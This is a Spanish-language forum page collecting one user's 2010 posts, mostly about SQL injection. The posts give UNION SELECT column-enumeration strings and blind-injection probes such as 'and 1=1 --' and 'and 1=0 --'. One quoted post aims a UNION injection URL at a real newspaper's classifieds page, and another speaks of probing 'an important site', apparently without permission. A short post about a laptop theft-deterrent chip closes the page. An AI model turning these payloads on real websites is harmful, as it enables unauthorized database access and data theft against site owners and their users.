Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - volteo0101

#21
Q desastre.
#22
Cita de: XXX-ZERO-XXX en 15 Diciembre 2010, 23:54 PM
busca otra vulnerabilidad, para q se pueda en sql i ,tiene q aparecer algun error de sql xD

hay administradores que desactivan en el php.ini unas lineas para que el sql en caso de error no los devuelva, en ese caso surgen la blind sql inyect. xD
creeria que no vas a poder hacer el mysql inyection,el error 404 sale cuando el servidor no encuentra la pagina que solicitas con la consulta http
#23
Cita de: RedZer en 26 Diciembre 2010, 20:19 PM
hola volteo0101 lo acabo de hacer asi como dices y me acorde que tambien en un pricipio asi le estaba haciendo ,solo me sigue arojando el mismo error este
Código (php) [Seleccionar]

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/xopin/public_html/clasificados.php on line 13


la url quedo asi
Código (php) [Seleccionar]

http://www.laopinion.com.mx/clasificados.php?tipo=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--

estavez solo llegue hasta 50

al parecer no es vulnerable, eso creo .. no me devuelve las columnas.
#24
hola RedZer , prueba poniendo después de la consulta COMENTARIOS EN MYSQL para dejar sin efecto el resto de la consulta..

ejemplo

www.ejemplo.com.ar/archivo.php?id=-1+union+select+0,1,2,3,4 --

saludos.
#25
Nivel Web / [Duda]Blind sql inyection.
24 Diciembre 2010, 03:53 AM
buenas,estuve leyendo algo sobre blind sql inyection.

y me tope con una web similar a ..

ejemplo.com/archivo.php?id=1

Mostraba unas contrataciones ,

al poner..

ejemplo.com/archivo.php?id=1 and 1 = 1 --


Mostraba las contrataciones ,

Al poner..

ejemplo.com/archivo.php?id=1 and 1 = 0 --

No mostraba nada, suponia que habia un blind..

luego intente hacer lo siguiente..

ejemplo.com/archivo.php?id=1 and (Select (*) from admin) --


No mostraba nada..

ejemplo.com/archivo.php?id=1 and (Select (*) from noticias) --


No mostraba nada..

ejemplo.com/archivo.php?id=1 and (Select (*) from mysql) --

tampoco .

probe tambien con cout.

ejemplo.com/archivo.php?id=1 and (Cout(*) from mysql) --

Nada.

Es blind sql inyection, estoy haciendo algo mal?¿ , la pagina que vulnero es una importante bien hecha,  no creo que no tenga ninguna de las tablas..
sera un switch ?

saludos.
#26
Nivel Web / Re: Asunto
23 Diciembre 2010, 02:07 AM
si estas estudiando lo que es mysql inyection,para comprobar si una pagina es vulnerable a mysqlI ,  puedes probar de las siguientes maneras (estas son las mas conocidas y mas usadas)

tenemos una pagina ej :

www.ejemplo.com/nota.php?id=3
ponemos una comilla.

www.ejemplo.com/nota.php?ID='

Si el sql tira error, y imprime el eerror en pantalla seguimos con el -1+union+select+0,1,2,3,4 --

hasta que sepamos que columna imprime y seguir con la inyeccion.

si el resultado de la comilla , no devuelve ni error ni nada ,podemos probar con

www.ejemplo.com.ar/nota.php?id=3 and 1=1 --
si imprime la noticia , probamos con id=3 and 1 = 0 -- si no la imprime sabemos que es vulnerable.

Salu2
#27
lei algo sobre un chip que es controlado por un software , que se llama theft deterrent, es algo asi como funciona cuando se arranca la pc.

Chip ( Si no esta bloqueado ) -- > bios --> ruta.


va a estar dificil si la pc se bloquea difinitivamente u.u